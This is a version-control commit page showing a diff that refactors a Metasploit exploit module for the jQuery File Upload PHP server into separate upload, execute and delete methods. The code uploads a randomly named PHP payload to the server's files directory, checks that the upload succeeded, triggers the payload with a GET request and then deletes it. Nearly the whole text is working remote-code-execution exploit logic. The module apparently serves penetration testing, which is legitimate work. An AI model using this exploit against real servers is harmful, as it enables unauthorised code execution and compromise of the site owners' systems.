Refactor slightly with methods

And also check upload response.
2018-10-22 21:21:08 -05:00 · 2018-10-22 21:21:08 -05:00 · dba7e35819
parent e7ada1a40c
commit dba7e35819
1 changed files with 24 additions and 1 deletions
--- a/modules/exploits/unix/webapp/jquery_file_upload.rb
+++ b/modules/exploits/unix/webapp/jquery_file_upload.rb
@ -49,6 +49,25 @@ class MetasploitModule < Msf::Exploit::Remote

  def exploit
    f = "#{rand_text_alphanumeric(8..42)}.php"
+    u = normalize_uri(target_uri.path, "server/php/files/#{f}")
+
+    print_status('Uploading payload')
+    res = upload_payload(f)
+
+    unless res && res.code == 200 && res.body.include?(f)
+      fail_with(Failure::NotVulnerable, 'Could not upload payload')
+    end
+
+    print_good("Payload uploaded: #{full_uri(u)}")
+
+    print_status('Executing payload')
+    exec_payload(u)
+
+    print_status('Deleting payload')
+    delete_payload(f)
+  end
+
+  def upload_payload(f)
    p = get_write_exec_payload(unlink_self: true)

    m = Rex::MIME::Message.new
@ -60,12 +79,16 @@ class MetasploitModule < Msf::Exploit::Remote
      'ctype'  => "multipart/form-data; boundary=#{m.bound}",
      'data'   => m.to_s
    )
+  end

+  def exec_payload(u)
    send_request_cgi({
      'method' => 'GET',
-      'uri'    => normalize_uri(target_uri.path, "server/php/files/#{f}")
+      'uri'    => u
    }, 1)
+  end

+  def delete_payload(f)
    send_request_cgi(
      'method'   => 'DELETE',
      'uri'      => normalize_uri(target_uri.path, 'server/php/index.php'),